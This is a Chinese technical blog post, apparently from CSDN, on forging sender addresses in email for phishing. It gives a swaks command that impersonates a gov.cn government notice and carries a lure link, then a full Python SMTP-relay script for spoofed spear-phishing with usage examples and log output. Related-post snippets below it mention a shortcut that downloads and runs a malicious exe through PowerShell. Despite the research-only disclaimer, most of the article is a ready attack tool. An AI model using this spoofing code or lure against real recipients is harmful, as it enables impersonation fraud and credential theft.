命令行使用伪造任意地址发送邮件的钓鱼攻击方法

最新推荐文章于 2024-03-18 00:23:31 发布
最新推荐文章于 2024-03-18 00:23:31 发布
阅读量1.3k 收藏 3
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fjh1997/article/details/113705391
版权

注意,本文提供的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,作者不承担任何法律及连带责任。

有时候,黑客会通过精心编辑的smtp协议包达到钓鱼的目的。因此在邮箱里收到邮件,不能被邮件的发送地址给欺骗,因为有可能的伪造的,如下例子:

swaks --to victim@126.com --from moe@gov.cn --h-From: '政府通知<tongzhi@gov.cn>' --h-Subject "通知:关于中小企业新政策" --h-X-Mailer gov.cn --h-Message-Id gov.cn  --ehlo gov.cn --body "请点击网址https://www.hack.com查看"

需要注意的是,这个方法只能应用给不存在的邮箱地址,如果是开了 dkim,dmarc,spf 的域名的邮件地址就不能用这个方法,就要用SMTP中继协议来伪造。参考如下:

#!/usr/bin/python
"""
@Rvn0xsy - 鱼叉自动化脚本

该脚本需要一个邮件服务器用来Relay,其次需要一个邮件正文eml文件用于发送,邮件服务器需要满足以下条件:

1.支持转发
2.SPF
3.DKIM

格式解释:
'=?UTF-8?B?这里是BASE64编码?='

B = Base64

其中eml文件需要去除Header部分,脚本负责重构。


Example >

$ python .\smtp-relay.py -f <发送邮箱> -t <目标邮箱> -u <邮箱用户名> -p <邮箱密码> -r <伪造对象> --relay_name <伪造对象名称> --subject <邮件标题> -b <邮件正文文件>
~\Desktop> python .\smtp-relay.py -f rvn0xsy@gmail.com -t rvn0xsy@gmail.com -u user -p XXX -r admin@gmail.com --relay_name 二维码科技 --subject 测试 -b .\send.eml
2019-07-24 22:39:50,861 - .\smtp-relay.py[line:80] - INFO: 235 Authentication successful
2019-07-24 22:39:53,979 - .\smtp-relay.py[line:52] - INFO: 250 Data Ok
2019-07-24 22:39:53,983 - .\smtp-relay.py[line:87] - INFO: QUIT

PS: DATA内容就是eml文件

============<Header>============
Date: Wed, 24 Jul 2019 15:47:10 +0800 (CST)
From: =?UTF-8?B?xxx?= xxx
To: xxx
Subject: =?UTF-8?B?xxx?=
============</Header>============

============<DATA>============

X-Mailer: Server Version 1.0
Content-Type: multipart/mixed; 
	boundary="----=_Part_65_550351629.1563948317509"
MIME-Version: 1.0
Message-ID: <7a422a.12.16c22957b47.xxx>
Date: Wed, 24 Jul 2019 15:47:10 +0800 (CST)

------=_Part_65_550351629.1563948317509
Content-Type: multipart/alternative; 
	boundary="----=_Part_67_1156720723.1563948317510"

------=_Part_67_1156720723.1563948317510
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: base64

5L2g5Lus5aW95qOS77yB5Yqg5rK577yB

------=_Part_67_1156720723.1563948317510

============</DATA>============
"""
import telnetlib
import time
import logging
import base64
import argparse

logging.basicConfig(format='%(asctime)s - %(pathname)s[line:%(lineno)d] - %(levelname)s: %(message)s',level=logging.INFO)

class SMTPClient():
    def __init__(self,):
        self.mail_from = ''
        self.mail_to = []
        self.send_data = ''
        self.mail_header = ''
        self.tn = telnetlib.Telnet()
    def set_mail_header(self,mail_subject,mail_relay,mail_relay_name):
        now_date = time.strftime("%a, %d %b %Y %H:%M:%S +0800 (CST)", time.localtime())
        self.mail_header = "Date: {}\r\nFrom: =?UTF-8?B?{}?= <{}>\r\nTo: {}\r\nSubject: =?UTF-8?B?{}?=\r\n".format(now_date,
            base64.b64encode(mail_relay_name.encode()).decode(),
            mail_relay,
            self.mail_to[0],base64.b64encode(mail_subject.encode()).decode())
        
    def set_mail(self,mail_from,mail_to,send_body):
        self.mail_from = mail_from
        self.mail_to = mail_to
        with open(send_body, "rb") as f_body:
            self.send_data = f_body.read()
        f_body.close()
    def send_ehlo(self, content):
        self.tn.write(content.encode())

    def send_mail(self):
        mail_from = "MAIL FROM:<%s>" % self.mail_from
        logging.info(mail_from)
        # 250 Mail Ok
        self.tn.write(mail_from.encode() + b'\r\n')
        self.tn.read_until(b"250 Mail Ok\r\n",timeout=3)
        logging.info("250 Mail Ok")
        
        for mail in self.mail_to:
            mail_rpct = "RCPT TO:<%s>" % mail
            self.tn.write(mail_rpct.encode() + b'\r\n')
            self.tn.read_until(b"250 Rcpt Ok\r\n",timeout=3)
            logging.info(mail_rpct)
        # 250 Rcpt Ok
        self.tn.write(b'DATA\n')
        self.tn.read_until(b"354 End data with <CR><LF>.<CR><LF>\r\n",timeout=3)
        # 354 End data with <CR><LF>.<CR><LF>
        send_all = self.mail_header.encode()+self.send_data+b"\r\n.\r\n"
        # self.tn.write(self.mail_header.encode()+b"\r\n")
        # self.tn.write(self.send_data+b"\r\n.\r\n")
        self.tn.write(send_all)
        # 250 Data Ok: queued as freedom
        self.tn.read_until(b"250 Data Ok: queued as freedom\r\n",timeout=3)
        logging.info("250 Data Ok")
    def login_host(self,host_ip,username,password):
        try:
            self.tn.open(host_ip,port=25)
        except:
            logging.warning('%s Connect Error..'%host_ip)
            return False
        self.send_ehlo("EHLO virtual-machine\r\n")
        # 250-smtp.aliyun-inc.com
        # 250-STARTTLS
        # 250-8BITMIME
        # 250-AUTH=PLAIN LOGIN XALIOAUTH
        # 250-AUTH PLAIN LOGIN XALIOAUTH
        # 250-PIPELINING
        # 250 DSN
        self.tn.read_until(b"250-smtp.aliyun-inc.com\r\n",timeout=3)
        self.tn.read_until(b"250-STARTTLS\r\n",timeout=3)
        self.tn.read_until(b"250-8BITMIME\r\n",timeout=3)
        self.tn.read_until(b"250-AUTH=PLAIN LOGIN XALIOAUTH\r\n",timeout=3)
        self.tn.read_until(b"250-AUTH PLAIN LOGIN XALIOAUTH\r\n",timeout=3)
        self.tn.read_until(b"250-PIPELINING\r\n",timeout=3)
        self.tn.read_until(b"250 DSN\r\n",timeout=3)
        self.tn.write(b"AUTH LOGIN\r\n")
        self.tn.read_until(b"334 dXNlcm5hbWU6\r\n",timeout=3)
        self.tn.write(base64.b64encode(username.encode()) + b'\r\n')
        self.tn.read_until(b"334 UGFzc3dvcmQ6\r\n",timeout=3)
        self.tn.write(base64.b64encode(password.encode()) + b'\r\n')
        self.tn.read_until(b"235 Authentication successful\r\n",timeout=3)
        logging.info("235 Authentication successful")
        return True

    def logout_host(self):
        self.tn.write(b"QUIT\r\n")
        self.tn.read_until(b"221 Bye\r\n",timeout=3)
        self.tn.close()
        logging.info("QUIT")

if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.description = "AMAIL SMTP Relay Client - Version 1.0"
    parser.add_argument("-f","--mail_from",type=str,help="Mail From",required = True)
    parser.add_argument("-t","--mail_to",type=str,help="Mail To",required = True)
    parser.add_argument("-u","--username",type=str,help="SMTP Username",required = True)
    parser.add_argument("-p","--password",type=str,help="SMTP Password",required = True)
    parser.add_argument("-s","--server",type=str,help="SMTP Server", default="smtp.mxhichina.com")
    parser.add_argument("-b","--body",type=str,help="Mail Body", required = True)
    parser.add_argument("-r","--relay",type=str,help="Mail Relay To", required = True)
    parser.add_argument("--relay_name",type=str,help="Mail Relay To Name", required = True)
    parser.add_argument("--subject",type=str,help="Mail Subject", required = True)
    args = parser.parse_args()
    
    smtp_client = SMTPClient()

    if smtp_client.login_host(args.server,args.username,args.password):
        smtp_client.set_mail(args.mail_from,args.mail_to.split(","),args.body)
        smtp_client.set_mail_header(args.subject,args.relay,args.relay_name)
        smtp_client.send_mail()
        smtp_client.logout_host()

参考:https://payloads.online/archivers/2020-02-05/1/

fjh1997
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
鉴定任意伪造指定邮箱发件人邮件地址 亲测有效
04-03
本软件是由邮箱资料站旗下邮箱反垃圾邮件过滤产品技术部独家研制开发,研究此产品的目的主要是希望国内外的邮箱企业能使用我们的软件,来检测完善自身的邮箱产品的不足,弥补在防钓鱼,反垃圾邮件技术上的缺失。可伪造任意邮箱发送邮件,对市面上的所有的邮箱都有显著的效果,当然也会有个别的邮箱的拦截系统比较完善,不可避免的可能会进入到垃圾箱里。
常用的邮件钓鱼伪装方法
m0_61869253的博客
08-10 630
修改快捷方式中的目标栏内容执行powershell命令下载木马将以下内容写入目标栏中&cmd调用powershell,隐藏窗口执行下载网站的EXE恶意文件,存储到某一文件夹下,命令行运行EXE恶意文件隐藏恶意文件,利用命名及图标伪装的快捷方式诱导点击将真实要执行的恶意文件进行隐藏(此步骤可选)创建快捷方式指向该文件,修改目标内容为explorer.exe .\evil.exe 将起始位置内容删除。
电子邮件伪造
最新发布
zy010101博客
03-18 1533
电子邮件伪造是指发送者故意篡改邮件头部信息,以使邮件看起来似乎是来自另一个人或组织的行为。这种行为可能用于欺骗、诈骗、垃圾邮件发送等目的。
论文研究-基于伪造IP地址检测的轻量级DDoS防御方法.pdf
07-22
由于网络速率的不断增加和网络带宽的不断变大,采用维持连接状态的方式进行DDoS攻击防御变得越来越困难。通过检查伪造IP地址防御DDoS攻击是高速链路上防御DDoS攻击的一种有效方法。由Wang Haining 等人提出的HCF在训练完全的情况下对伪造IP地址具有较强的检测能力。但由于网络流量构成的显著变化,网络流量的动态性明显增强。在当前网络环境下的HCF很难训练完全,从而使得HCF在当前网络环境下的检测能力大幅降低。基于HCF使用的基本原理在其基础之上引入了主机安全指数的概念,并修改了其实现的数据结构
QQ邮箱发邮件怎么让对方不知道?如何单显
danplus的博客
12-26 710
通过以上几种方法,你可以在使用QQ邮箱发邮件时,有效避免被对方发现。当然,在使用这些方法时也要遵守相关法律法规。这边推荐“蜂邮EDM外贸版”,拥有拖拽式编辑器,一举拖拽即可制作精美模板,支持配置独立域名让你的邮件更加权威,高触达模式的设计,让你的邮件拥有更高的送达率。
如何在线伪造邮箱发件人,用任意邮箱发送邮件
热门推荐
03-19 2万+
今天邮箱收到一封自己域名发过来的邮件,但是询问当事人说并没有发送相关邮件,于是去百度了下,看是否可以伪造发件人,于是找到一个网站http://tool.chacuo.net/mailanonymous,这个网站可以用任意邮箱地址发邮件,于是我测试了一封发给我的QQ邮箱,果然收到了,但是在垃圾邮箱,我又发送另外一封邮件到微软邮箱,但是显示发送失败 我去百度了下,因为SMTP协议不需要身份认证,所以可以伪造,但是如果域名加了SPF记录,接收邮件方会根据你的SPF记录来判断发送过来的IP地址是否被包含在.
红蓝对抗之邮件伪造
xnxqwzy的博客
09-13 2399
SPF(Sender Policy Framework),它是以IP地址认证电子邮件发件人身份的技术。邮件接收方会检查我们的MailFrom下的域名,并去检查该域名的spf记录,如果spf记录存在,就会把邮件发送者的ip与spf记录进行匹配,如果匹配成功就认为是正确的邮件,否则则认为该邮件是伪造的,将邮件按照规则进行处理这样攻击者可以假装这个域下的所有其他用户,伪造该域下用户可以直接无视所有验证协议。
几个好用的邮件伪造工具
weixin_50464560的博客
03-22 1万+
工欲善其事必先利其器,我们来介绍两款用于邮件伪造的测试工具,实现伪造任意用户邮箱。SimpleEmailSpoofer这是一个很简单的python脚本,帮助渗透测试人员进行电子邮件伪造。Github项目地址:https://github.com/lunarca/SimpleEmailSpoofergit clone https://github.com/lunarca/SimpleEmailSpoofer.git cd SimpleEmailSpoofer/ pip install -r requireme
如何发送伪造的电子邮件
java技术交流
02-16 2258
最近在看有关协议分析的资料,其中谈到了邮件传输协议(SMTP)的工作原理,深受感触。之后在网上又搜索了一些相关的资料,大概的整理了一下,希望对大家有帮助,有不对的地方请批评指正。 对照此方法可以检验你的邮件服务器是否有此方面的安全缺陷。对用此方法而引起的后果自负(如需转载,请注明信息来源) 一、SMTP 邮件的传输    共分为三个阶段:1、建立连接2、数据传输3、连接关闭 ...
网安工具系列:几个好用的邮件伪造工具
weixin_54626591的博客
01-13 1584
工欲善其事必先利其器,我们来介绍两款用于邮件伪造的测试工具,实现伪造任意用户邮箱
Mail-forge-python:使用虚假发件人地址发送邮件
07-09
我们在 orderr 中使用 python 从任何邮件地址通过 Telnet 发送邮件,连接到不需要身份验证的 SMTP 服务器。 安装 首先你需要从安装 DNSpython 下载构建并安装 dnspython 后,键入 python setup.py install
基于源地址伪造的Web服务DoS攻击防御方法
03-01
基于源地址伪造的Web服务DoS攻击防御方法
php防止伪造数据从地址栏URL提交的方法
12-17
针对伪造的数据从URL提交的情况,首先是一个检查前一页来源的如下代码: <?/*PHP防止站外提交数据的方法*/ function CheckURL(){ $servername=$_SERVER['SERVER_NAME']; $sub_from=$_SERVER["HTTP_REFERER"]; $...
红队笔记之邮箱伪造实战
明光札记
12-03 1505
文章目录技术要点理由的合理性不管的危害性操作的简易性操作步骤分析目标准备软件准备邮件服务准备可以搭建smtp服务的服务器安装smtp服务配置smtp服务启动smtp服务测试smtp服务安装mailx使用mailx发送测试邮件安装gophish下载解压修改配置授权并启动登录gophish建立发送策略准备钓鱼网站撰写邮件制作模板配置被攻击者群组配置攻击任务等待上钩 邮箱钓鱼属于常用钓鱼手段的一种,其利用在信息收集阶段对于被攻击组织或个人的了解到的信息,伪造邮件,通过邮件的方式引导被攻击者下载安装木马文件或者登.
关于冒充其他人发送电子邮件
smstong的成长轨迹
11-04 8667
今天使用Linux下的mail发送电子邮件,发现可以随便填写发件人地址,测试如下: 执行命令: 然后到126邮箱去看看,收件箱里出现了:   不过有个限制,就是如果假冒的地址是126.com的,那么就不会发送成功。 可见对于接收端:126邮箱只是检查发件人是不是冒充自己所管辖的用户,对于其他邮箱的用户它无权也没有办法去检查。 对于发送端:sendmail也不会检查发送地址是谁。
识破“钓鱼伪装 邮箱防骗策略详解
weixin_30496431的博客
08-13 920
作者 作者|Feei(止介):蚂蚁金服负责安全架构工作,任高级安全专家,原美丽联合集团信息安全总监, Cobra作者,擅长解决方案产品化和项目管理,同时也是一名安全工程师,专注于自动化安全发现与防御,擅长安全架构设计、安全产品解决方案并产品化。 1邮件伪造实践 1.1 邮件伪造原理 SMTP协议本身的From是可以随便填写的,多见于各种邮件钓鱼。...
邮件伪造之SPF绕过的5种思路
技术超强的网络安全平台
03-21 791
https://www.cnblogs.com/chen110xi/p/4651482.html 邮件伪造之SPF绕过的5种思路 SMTP(SimpleMail Transfer Protocol)即简单邮件传输协议,正如名字所暗示的那样,它其实是一个非常简单的传输协议,无需身份认证,而且发件人的邮箱地址是可以由发信方任意声明的,利用这个特性可以伪造任意发件人。SPF 出现的目的,就是为了防止随意伪造发件人。SPF,全称为 Sender Policy Framework,是一种以IP地址认证电子邮件发件人
伪造Email地址方法
weixin_34348174的博客
01-06 2286
作者:宋雁鸣转载请指明文章出自IT英雄榜[url]http://www.itheroes.cn[/url]电子邮件地址欺骗是***常用的一种***手法,他们会伪造一个看起来会使我们信任的邮件地址,并会以各种名义套取我们的帐号,密码等敏感信息,使我们落入他们的圈套。下面我们就来看一下电子邮件地址欺骗是如何实现的。我们需要装一个叫Advanced Direct Remailer的...
如何使用kali伪造邮箱发送邮件
05-10
在Kali Linux中,您可以使用邮件伪造工具来伪造电子邮件。其中一个流行的工具是“SendEmail”。您可以按照以下步骤使用SendEmail来伪造电子邮件: 1. 安装SendEmail工具。在终端中输入以下命令: ``` sudo apt-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值